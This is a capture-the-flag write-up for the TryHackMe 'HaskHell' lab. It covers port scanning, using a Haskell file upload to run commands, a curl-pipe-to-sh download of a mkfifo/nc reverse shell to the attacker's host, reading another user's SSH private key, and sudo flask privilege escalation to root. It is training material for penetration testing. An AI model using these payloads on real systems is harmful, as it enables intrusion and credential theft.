# THM - HaskHell

## Nmap

```bash
nmap -v -p- 10.10.129.238 
Discovered open port 22/tcp on 10.10.129.238
Discovered open port 5001/tcp on 10.10.129.238
```
 
```bash
nmap -A -p5001,22 10.10.129.238
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 04:44 EDT
Nmap scan report for 10.10.129.238
Host is up (0.063s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1df353f76d5ba1d484510ddd66404d90 (RSA)
|   256 267cbd338fbf09ac9ee3d30ac334bc14 (ECDSA)
|_  256 d5fb55a0fde8e1ab9e46afb871900026 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.13 seconds
```

## Web enumeration

with go buster found an endpoint : `/submit` 

It seems we can upload an **haskell**

First thing i wanna try is to check if i can execute command an our target.

i made a simple haskell script 

```      
import System.Process

main = callCommand "curl http://10.8.17.62:8000"
```

I start a web server, and upload my script. And yes, got a hit !

```
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.83.125 - - [26/Jul/2023 01:10:07] "GET / HTTP/1.1" 200 -
```

Now, time to try to get a shell !


## Get a shell on the target 

I modified my `curl.hs` file like this to download a bash reverseshell 

```
$ cat curl.hs                                                                                                      │
import System.Process                                                                                                │
                                                                                                                     │
main = callCommand "curl http://10.8.17.62:8000/shell.sh|sh"
```

This the content of my `shell.sh` 

```bash
$ cat shell.sh                                                                                                     │
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.17.62 9001 >/tmp/f
```

Finally, start a webserver and a listener

```
# be sure to be in the same directory as your scripts
$ python3 -m http.server
```

and the nc listener

```bash
$ nc -lnvp 9001
```

Upload the `curl.hs` script annnnnnd yeah got shell :DD

```bash
nc -lvnp 9001
listening on [any] 9001 ...
$ id
uid=1001(flask) gid=1001(flask) groups=1001(flask)
```

## Escalation to the prof user

After some enumeration, i found the private ssh key of the **prof** user

```
$ cat /home/prof/.ssh/id_rsa
```

Let's copy this one in our kali and try to connect with this key by ssh 

```bash
$ ssh -i prof.key prof@10.10.83.125
$ id
uid=1002(prof) gid=1002(prof) groups=1002(prof)
```
## Escalation to root

First i list my sudo priveleges

```bash
$ sudo -l
(root) NOPASSWD: /usr/bin/flask run
```

Okaaaaay, seems we can run as **sudo** this following command : `/usr/bin/flask run`

After some research, i found this git repositorie that give us a payload : *https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics*

```
$ echo 'import pty; pty.spawn(“/bin/bash”)' > flask.py
$ export FLASK_APP=flask.py
$ sudo /usr/bin/flask run
```
But facing with some error : 

```
sudo /usr/bin/flask run
Usage: flask run [OPTIONS]

Error: Failed to find application in module "flask".  Are you sure it contains a Flask application?  Maybe you wrapped it in a WSGI middleware or you are using a factory function.
```

After reading this page : *https://www.twilio.com/fr/blog/executer-application-flask*

I tried to rename my script from `flask.py` to `shell.py` 

change this name to the previous commands : 

```
prof@haskhell:~$ mv flask.py shell.py
prof@haskhell:~$ export FLASK_APP=shell.py
prof@haskhell:~$ sudo /usr/bin/flask run
root@haskhell:~# id
uid=0(root) gid=0(root) groups=0(root)
```

And yeah we'rrr root :D
